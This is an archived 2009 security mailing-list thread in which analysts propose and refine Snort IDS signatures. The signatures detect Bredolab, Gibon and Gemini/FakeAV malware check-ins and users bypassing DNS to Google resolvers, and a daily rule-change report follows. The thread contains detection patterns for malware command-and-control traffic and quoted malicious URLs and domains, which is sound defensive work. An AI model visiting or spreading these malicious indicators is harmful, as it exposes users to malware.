Subject: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
	and and 	proposed modification to SID 2009354
In-Reply-To: <617fc350912031726j398f8ddfide889ab566bc0e66@mail.gmail.com>
References: <617fc350912031726j398f8ddfide889ab566bc0e66@mail.gmail.com>
Message-ID: <839aec700912040901n3c466a25g53a28bef5c84b799@mail.gmail.com>

Thanks.

2008337 looks to identify, no?

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
Win32.Small.dvs or Related DDOS Checkin"; flow:established,to_server;
content:"GET ?ddos=x"; depth:11; classtype:trojan-activity;
reference:url,doc.emergingthreats.net/2008337;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Win32.Small.dvs;
sid:2008337; rev:2;)

Probably only need one of them, would suggest rule msg update to
reflect common name Gibon.

DS


On Thu, Dec 3, 2009 at 6:26 PM, gilou <gilout at gmail.com> wrote:
> The "?ddos=" request is from Gibon.
>
> As an additional reference, here is a ThreatExpert report for another
> variant of Gibon:
> http://www.threatexpert.com/report.aspx?md5=011d403b345672adc29846074e717865
>
>
>
>> ------------------------------
>>
>> Date: Wed, 2 Dec 2009 12:43:08 -0700
>> From: Darren Spruell <phatbuckett at gmail.com>
>> Subject: Re: [Emerging-Sigs] Two new signatures (Bredolab + FakeAV),
>> ? ? ? ?and and ? ? ? ? proposed modification to SID 2009354
>> To: "evilghost at packetmail.net" <evilghost at packetmail.net>
>> Cc: "emerging-sigs at emergingthreats.net"
>> ? ? ? ?<emerging-sigs at emergingthreats.net>
>> Message-ID:
>> ? ? ? ?<839aec700912021143o3aaea5a5r7f193a4c0d340e29 at mail.gmail.com>
>> Content-Type: text/plain; charset=ISO-8859-1
>>
>> The match on ?ddos=x7x29x1x36x32x27x16x29x32x31x17x27x7x36x29x18x30x9x33x27x13x29x0x7
>> isn't Bredolab, it's something else (I presume a DDoS bot). The
>> Bredolab communication is that referencing
>> youaskedthedomain.cn/spl/controller.php[...].
>>
>> Anybody recognize it?
>>
>> DS
>>
>>
>> On Mon, Nov 30, 2009 at 2:11 PM, evilghost at packetmail.net
>> <evilghost at packetmail.net> wrote:
>>> SID 2009354, based on http://threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37 I suggest changing the uricontent:"&entity="; to uricontent:"&entity";
>>>
>>> Proposed new signatures below:
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
>>> Bredolab Checkin"; flow:to_server,established; content:"GET "; depth:4;
>>> uricontent:"?ddos=x"; nocase; pcre:"/\x3Fddos\x3D(x\d{1,2}){5,}/Ui";
>>> classtype:trojan-activity;
>>> reference:url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37;
>>> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab;
>>> sid:2009xxx; rev:1;)
>>>
>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Fake
>>> AV GET"; flow:established,to_server; content:"GET "; depth:4;
>>> uricontent:".php?"; nocase; uricontent:"affid="; nocase;
>>> uricontent:"subid="; nocase; uricontent:"type="; nocase;
>>> uricontent:"version="; nocase; uricontent:"adware"; nocase;
>>> classtype:trojan-activity;
>>> reference:url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35;
>>> sid:2009xxx; rev:1;)
>>>
>>> Comments/flames welcome.
>>>
>>> -evilghost
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>
>>
>>
>>
>> --
>> Darren Spruell
>> phatbuckett at gmail.com
>>
>>
>



-- 
Darren Spruell
phatbuckett at gmail.com

From eslerj at gmail.com  Fri Dec  4 12:16:50 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 4 Dec 2009 11:16:50 -0600
Subject: [Emerging-Sigs] ET TROJAN Potential Gemini/Fake AV Download URL
	Detected
In-Reply-To: <4B193F63.3080902@packetmail.net>
References: <6116b9e20912020743n5dd8de20t20234940e551230b@mail.gmail.com>
	<B39E6AE0-A343-4AE7-AB86-777CEFBC3535@jonkmans.com>
	<bf5205e0912040753s5b47649ye0fb796d157dcb95@mail.gmail.com>
	<314cf0830912040808u5400ac9ue16fc70fc6e99d6b@mail.gmail.com>
	<33D3237E-57A2-4135-BC05-8FB6C492B1F4@jonkmans.com>
	<4B193A7A.30503@packetmail.net> <4B193F63.3080902@packetmail.net>
Message-ID: <314cf0830912040916m5f756aa1tc177209d46a2e902@mail.gmail.com>

On Fri, Dec 4, 2009 at 10:57 AM, evilghost at packetmail.net <
evilghost at packetmail.net> wrote:

> Looking at my data, the second URL (just p=) is not reporting, this is
> the initial site hit from the SEO poisoning and/or banner-ad
> redirection.  PCAP captures confirm this (HTTP REFERER is Google and/or
> other search engines).  From there, the site is displayed/etc and the
> first URL (download) is hit and download is attempted.
>
> The string p52dcW is present after the p=, however, is it p52dcWltbV or
> p52dcWpbrF not the string Joel provided (so only a bit is constant,
> perhaps just p52dcW).  This was observed across multiple end-points and
> sites, spanning various dates.
>

yeah, I was doing two things at once..  so you can tell.. ;)



>
> We could potentially sig on this but all we'll be doing is firing on
> initial site access, not reporting, and SID 2010007 already detects the
> actual download.
>
> AFAIK %2F will be decoded in the URI buffer (Joel, is this correct)
> since the string is p52dcW[A-Za-z]{4}%2F
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET Trojan
> Potential Gemini/FakeAV site access"; flow:established,to_server;
> uricontent:".php?p=p52dcW"; pcre:"/\.php\?p=p52dcW[A-Za-z]{4}\x2f/U";
> classtype:trojan-activity;
> reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;
> sid:2010xxx; rev:1;)
>
>
If you guys remember back about six months ago, someone provided a ton of
really unique URLs and I wrote a big signature with a really complex pcre to
catch all the url's.  Probably the same thing will need to be done here.

J



> -evilghost
>
> evilghost at packetmail.net wrote:
> > I see Gemini often, I will try to go back through my stuff as well to
> > see if we can find a unique string.  Question though, the first URL
> > isn't reporting, it's the download redirector/director.  The second URL,
> > is this successful download registration?  Is there value in adding the
> > second if we're detecting on the first?  Is the second URL dependent of
> > the first or self-generated?
> >
> > Matt Jonkman wrote:
> >
> >> We need to find a number of samples to see what remains constant in the
> url. Do you have other hits we can compare?
> >>
> >> Matt
> >>
> >> On Dec 4, 2009, at 11:08 AM, Joel Esler wrote:
> >>
> >>
> >>
> >>> What is that string?  the p52dcWIpcF%.... etc?  It's unique in and of
> itself.  As much as I hate to write a sig to look for that kind of string,
> is that a possibility?
> >>>
> >>> J
> >>>
> >>> On Fri, Dec 4, 2009 at 9:53 AM, Chris Green <greencm at gmail.com> wrote:
> >>> Has anyone played with these enough to get a signature for the Fake AV
> >>> reporting?  I
> >>>
> >>> Here's the URL and referer for one of these hits.
> >>>
> >>>
> hxxp://trustscan-onmyzone_com/build6_158.php?cmd=getFile&counter=1&p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
> >>>
> >>>
> hxxp://trustscan-onmyzone_com/?p=p52dcWlpcF%2FCj8bYbod2gnN%2FipnVbWaMnNah2qePglzHysd2lJOCeW9arK3NapuXY2SQaZVwmF7FVqPajtfZ1m5nWJnInomtpXFqZm1tcHGUZJqdV5l0pqGt1GqIoITPmsihlGNsa26dlJpvaw%3D%3D
> >>>
> >>> On Thu, Dec 3, 2009 at 9:41 PM, Matt Jonkman <jonkman at jonkmans.com>
> wrote:
> >>>
> >>>
> >>>> Posted, thanks Mike!
> >>>>
> >>>> Matt
> >>>>
> >>>> On Dec 2, 2009, at 10:43 AM, Mike Cox wrote:
> >>>>
> >>>>
> >>>>
> >>>>> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN
> Potential Gemini/Fake AV Download URL Detected"; flow:established,to_server;
> uricontent:"/Layouts/Landings/CentralLandings/"; nocase;
> uricontent:"/images/"; nocase;
> pcre:"/\x2FLayouts\x2FLandings\x2FCentralLandings\x2F\d+\x2Fimages\x2F/Ui";
> classtype:trojan-activity; reference:url,
> www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791;
> reference:url,
> www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini;
>  sid:2010xxx; rev:1;)
> >>>>>
> >>>>>
> >>>> ----------------------------------------------------
> >>>> Matthew Jonkman
> >>>> Emerging Threats
> >>>> Open Information Security Foundation (OISF)
> >>>> Phone 765-429-0398
> >>>> Fax 312-264-0205
> >>>> http://www.emergingthreats.net
> >>>> http://www.openinformationsecurityfoundation.org
> >>>> ----------------------------------------------------
> >>>>
> >>>> PGP: http://www.jonkmans.com/mattjonkman.asc
> >>>>
> >>>>
> >>>>
> >>>> _______________________________________________
> >>>> Emerging-sigs mailing list
> >>>> Emerging-sigs at emergingthreats.net
> >>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>>>
> >>>>
> >>>>
> >>> --
> >>> Chris Green <greencm at gmail.com>
> >>> _______________________________________________
> >>> Emerging-sigs mailing list
> >>> Emerging-sigs at emergingthreats.net
> >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>>
> >>>
> >>>
> >>> --
> >>> Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
> >>> _______________________________________________
> >>> Emerging-sigs mailing list
> >>> Emerging-sigs at emergingthreats.net
> >>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>>
> >>>
> >> ----------------------------------------------------
> >> Matthew Jonkman
> >> Emerging Threats
> >> Open Information Security Foundation (OISF)
> >> Phone 765-429-0398
> >> Fax 312-264-0205
> >> http://www.emergingthreats.net
> >> http://www.openinformationsecurityfoundation.org
> >> ----------------------------------------------------
> >>
> >> PGP: http://www.jonkmans.com/mattjonkman.asc
> >>
> >>
> >>
> >> _______________________________________________
> >> Emerging-sigs mailing list
> >> Emerging-sigs at emergingthreats.net
> >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >>
> >>
> >>
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
> >
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091204/c7c7da16/attachment-0001.html

From pepperjack at afferentsecurity.com  Fri Dec  4 13:25:58 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 04 Dec 2009 12:25:58 -0600
Subject: [Emerging-Sigs] Google DNS servers
Message-ID: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>

We try not to let users bypass our DNS servers, because we run  
blackhole dns and other special DNS redirectors for malware, etc, plus  
users who suddenly can't see internal web sites.  This rule picks up  
inside user trying to use one of the new super cool, "gosh why isn't  
everybody using this" Google DNS servers.

alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User  
misconfigured DNS resolver to use Google DNS servers";  
classtype:policy-violation; sid:1054432;threshold: type limit, track  
by_src, seconds 1800, count 1; reference:  
url,code.google.com/speed/public-dns/docs/using.html; rev:1;)

jp

-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From evilghost at packetmail.net  Fri Dec  4 13:35:16 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Fri, 4 Dec 2009 12:35:16 -0600
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
Message-ID: <4B195664.3030503@packetmail.net>

I like.  How about putting it in ET POLICY?

Jack Pepper wrote:
> We try not to let users bypass our DNS servers, because we run  
> blackhole dns and other special DNS redirectors for malware, etc, plus  
> users who suddenly can't see internal web sites.  This rule picks up  
> inside user trying to use one of the new super cool, "gosh why isn't  
> everybody using this" Google DNS servers.
>
> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User  
> misconfigured DNS resolver to use Google DNS servers";  
> classtype:policy-violation; sid:1054432;threshold: type limit, track  
> by_src, seconds 1800, count 1; reference:  
> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>
> jp
>
>   

From eslerj at gmail.com  Fri Dec  4 13:38:30 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 4 Dec 2009 12:38:30 -0600
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
Message-ID: <314cf0830912041038g20ae8bbcyda8d3a9657057c2d@mail.gmail.com>

Isn't there only two IPs? 8.8.8.8 and 8.8.4.4?

J

On Fri, Dec 4, 2009 at 12:25 PM, Jack Pepper <
pepperjack at afferentsecurity.com> wrote:

> We try not to let users bypass our DNS servers, because we run
> blackhole dns and other special DNS redirectors for malware, etc, plus
> users who suddenly can't see internal web sites.  This rule picks up
> inside user trying to use one of the new super cool, "gosh why isn't
> everybody using this" Google DNS servers.
>
> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
> misconfigured DNS resolver to use Google DNS servers";
> classtype:policy-violation; sid:1054432;threshold: type limit, track
> by_src, seconds 1800, count 1; reference:
> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>
> jp
>
> --
>
> Framework?  I don't need no stinking framework!
>
> ----------------------------------------------------------------
> @fferent Security Labs:  Isolate/Insulate/Innovate
> http://www.afferentsecurity.com
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091204/6e67ee14/attachment.html

From eoin.miller at trojanedbinaries.com  Fri Dec  4 13:43:18 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Fri, 04 Dec 2009 13:43:18 -0500
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
Message-ID: <4B195846.9040708@trojanedbinaries.com>

Shouldn't this really just be done via egress filtering and review of 
firewall logs? If it makes it in to the ET list, this sig is probably 
going to light up like a Christmas tree on larger networks. Not that it 
isn't a helpful/good idea.

-- Eoin

Jack Pepper wrote:
> We try not to let users bypass our DNS servers, because we run  
> blackhole dns and other special DNS redirectors for malware, etc, plus  
> users who suddenly can't see internal web sites.  This rule picks up  
> inside user trying to use one of the new super cool, "gosh why isn't  
> everybody using this" Google DNS servers.
>
> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User  
> misconfigured DNS resolver to use Google DNS servers";  
> classtype:policy-violation; sid:1054432;threshold: type limit, track  
> by_src, seconds 1800, count 1; reference:  
> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>
> jp
>
>   


From spooker at gmail.com  Fri Dec  4 13:45:43 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Fri, 4 Dec 2009 16:45:43 -0200
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <4B195846.9040708@trojanedbinaries.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com> 
	<4B195846.9040708@trojanedbinaries.com>
Message-ID: <9255886c0912041045x7ccf92e0hdf20af7d37ae50a8@mail.gmail.com>

Why not something like

alert udp $HOME_NET any -> !$DNS_SERVER 53 ....

It'll pick any non-internal DNS .

Regards,

On Fri, Dec 4, 2009 at 4:43 PM, Eoin Miller
<eoin.miller at trojanedbinaries.com> wrote:
> Shouldn't this really just be done via egress filtering and review of
> firewall logs? If it makes it in to the ET list, this sig is probably
> going to light up like a Christmas tree on larger networks. Not that it
> isn't a helpful/good idea.
>
> -- Eoin
>
> Jack Pepper wrote:
>> We try not to let users bypass our DNS servers, because we run
>> blackhole dns and other special DNS redirectors for malware, etc, plus
>> users who suddenly can't see internal web sites. ?This rule picks up
>> inside user trying to use one of the new super cool, "gosh why isn't
>> everybody using this" Google DNS servers.
>>
>> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
>> misconfigured DNS resolver to use Google DNS servers";
>> classtype:policy-violation; sid:1054432;threshold: type limit, track
>> by_src, seconds 1800, count 1; reference:
>> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>>
>> jp
>>
>>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.twitter.com/spookerlabs
http://www.linkedin.com/in/spooker

From eslerj at gmail.com  Fri Dec  4 13:49:55 2009
From: eslerj at gmail.com (Joel Esler)
Date: Fri, 4 Dec 2009 12:49:55 -0600
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <9255886c0912041045x7ccf92e0hdf20af7d37ae50a8@mail.gmail.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
	<4B195846.9040708@trojanedbinaries.com>
	<9255886c0912041045x7ccf92e0hdf20af7d37ae50a8@mail.gmail.com>
Message-ID: <314cf0830912041049s22cfbd73n21e36c8c0da87198@mail.gmail.com>

There already are those sigs I think Spooker...

J

On Fri, Dec 4, 2009 at 12:45 PM, Rodrigo Montoro(Sp0oKeR) <spooker at gmail.com
> wrote:

> Why not something like
>
> alert udp $HOME_NET any -> !$DNS_SERVER 53 ....
>
> It'll pick any non-internal DNS .
>
> Regards,
>
> On Fri, Dec 4, 2009 at 4:43 PM, Eoin Miller
> <eoin.miller at trojanedbinaries.com> wrote:
> > Shouldn't this really just be done via egress filtering and review of
> > firewall logs? If it makes it in to the ET list, this sig is probably
> > going to light up like a Christmas tree on larger networks. Not that it
> > isn't a helpful/good idea.
> >
> > -- Eoin
> >
> > Jack Pepper wrote:
> >> We try not to let users bypass our DNS servers, because we run
> >> blackhole dns and other special DNS redirectors for malware, etc, plus
> >> users who suddenly can't see internal web sites.  This rule picks up
> >> inside user trying to use one of the new super cool, "gosh why isn't
> >> everybody using this" Google DNS servers.
> >>
> >> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
> >> misconfigured DNS resolver to use Google DNS servers";
> >> classtype:policy-violation; sid:1054432;threshold: type limit, track
> >> by_src, seconds 1800, count 1; reference:
> >> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
> >>
> >> jp
> >>
> >>
> >
> > _______________________________________________
> > Emerging-sigs mailing list
> > Emerging-sigs at emergingthreats.net
> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
> >
>
>
>
> --
> Rodrigo Montoro (Sp0oKeR)
> http://www.spooker.com.br
> http://www.twitter.com/spookerlabs
> http://www.linkedin.com/in/spooker
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 
Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091204/274de161/attachment.html

From pepperjack at afferentsecurity.com  Fri Dec  4 14:25:33 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Fri, 04 Dec 2009 13:25:33 -0600
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <314cf0830912041049s22cfbd73n21e36c8c0da87198@mail.gmail.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
	<4B195846.9040708@trojanedbinaries.com>
	<9255886c0912041045x7ccf92e0hdf20af7d37ae50a8@mail.gmail.com>
	<314cf0830912041049s22cfbd73n21e36c8c0da87198@mail.gmail.com>
Message-ID: <20091204132533.6f9mvonfe8os48cw@mail.afferentsecurity.com>

In a university setting we can't tell people what to do with their own  
machines.  but we can use our PR and help desk capabilities to  
bitch-slap the ones who truly need it.  Student labor for desktop  
support is free and plentiful, plus they like doing it.

jp

Quoting Joel Esler <eslerj at gmail.com>:

> There already are those sigs I think Spooker...
>
> J
>
> On Fri, Dec 4, 2009 at 12:45 PM, Rodrigo Montoro(Sp0oKeR) <spooker at gmail.com
>> wrote:
>
>> Why not something like
>>
>> alert udp $HOME_NET any -> !$DNS_SERVER 53 ....
>>
>> It'll pick any non-internal DNS .
>>
>> Regards,
>>
>> On Fri, Dec 4, 2009 at 4:43 PM, Eoin Miller
>> <eoin.miller at trojanedbinaries.com> wrote:
>> > Shouldn't this really just be done via egress filtering and review of
>> > firewall logs? If it makes it in to the ET list, this sig is probably
>> > going to light up like a Christmas tree on larger networks. Not that it
>> > isn't a helpful/good idea.
>> >
>> > -- Eoin
>> >
>> > Jack Pepper wrote:
>> >> We try not to let users bypass our DNS servers, because we run
>> >> blackhole dns and other special DNS redirectors for malware, etc, plus
>> >> users who suddenly can't see internal web sites.  This rule picks up
>> >> inside user trying to use one of the new super cool, "gosh why isn't
>> >> everybody using this" Google DNS servers.
>> >>
>> >> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
>> >> misconfigured DNS resolver to use Google DNS servers";
>> >> classtype:policy-violation; sid:1054432;threshold: type limit, track
>> >> by_src, seconds 1800, count 1; reference:
>> >> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>> >>
>> >> jp
>> >>
>> >>
>> >
>> > _______________________________________________
>> > Emerging-sigs mailing list
>> > Emerging-sigs at emergingthreats.net
>> > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>> >
>>
>>
>>
>> --
>> Rodrigo Montoro (Sp0oKeR)
>> http://www.spooker.com.br
>> http://www.twitter.com/spookerlabs
>> http://www.linkedin.com/in/spooker
>> _______________________________________________
>> Emerging-sigs mailing list
>> Emerging-sigs at emergingthreats.net
>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>
>
>
>
> --
> Joel Esler | 302-223-5974 | gtalk: jesler at sourcefire.com
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From cunningpike at gmail.com  Fri Dec  4 15:49:19 2009
From: cunningpike at gmail.com (CunningPike)
Date: Fri, 4 Dec 2009 12:49:19 -0800
Subject: [Emerging-Sigs] Google DNS servers
In-Reply-To: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
References: <20091204122558.bi33n4t0ogok80co@mail.afferentsecurity.com>
Message-ID: <f1b6c340912041249h1051ef47teaf0d754462edb54@mail.gmail.com>

On Fri, Dec 4, 2009 at 10:25 AM, Jack Pepper
<pepperjack at afferentsecurity.com> wrote:
> We try not to let users bypass our DNS servers, because we run
> blackhole dns and other special DNS redirectors for malware, etc, plus
> users who suddenly can't see internal web sites. ?This rule picks up
> inside user trying to use one of the new super cool, "gosh why isn't
> everybody using this" Google DNS servers.
>
> alert udp !$DNS_SERVERS any -> [8.8.8.0/24,8.8.4.0/24] 53 ( msg: "User
> misconfigured DNS resolver to use Google DNS servers";
> classtype:policy-violation; sid:1054432;threshold: type limit, track
> by_src, seconds 1800, count 1; reference:
> url,code.google.com/speed/public-dns/docs/using.html; rev:1;)
>
 We use this more generic rule in our environment:

alert udp !$DNS_SERVERS any -> $EXTERNAL_NET 53 (msg:"LOCAL Outbound
Non-DNS Server DNS Traffic";
content:"|01|";offset:2;depth:1;threshold:type limit,track
by_src,count 1,seconds 60;classtype:misc-activity;sid:20000001;rev:1;)

YMMV.

CP

From emerging at emergingthreats.net  Fri Dec  4 16:00:17 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Fri,  4 Dec 2009 16:00:17 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091204210017.1F5874502D@goliath.jonkmans.com>


[***] Results from Oinkmaster started Fri Dec  4 16:00:17 2009 [***]

[+++]          Added rules:          [+++]

 2010450 - ET TROJAN Potential Gemini/Fake AV Download URL Detected (emerging-virus.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-sid-msg.map (1):
        2010450 || ET TROJAN Potential Gemini/Fake AV Download URL Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini || url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791

     -> Added to emerging-sid-msg.map.txt (1):
        2010450 || ET TROJAN Potential Gemini/Fake AV Download URL Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Gemini || url,www.virustotal.com/analisis/c36e206c6dfe88345815da41c1b14b4f33a9636ad94dd46ce48f5b367f1c736c-1254242791

     -> Added to emerging-virus.rules (1):
        #by Mike Cox

[---]     Removed non-rule lines:    [---]

     -> Removed from emerging-sid-msg.map (24):
        2500542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510542 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510543 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (272) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510544 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510545 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (273) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510546 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510547 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (274) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510548 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510549 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (275) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510550 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510551 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (276) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510552 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510553 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (277) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (24):
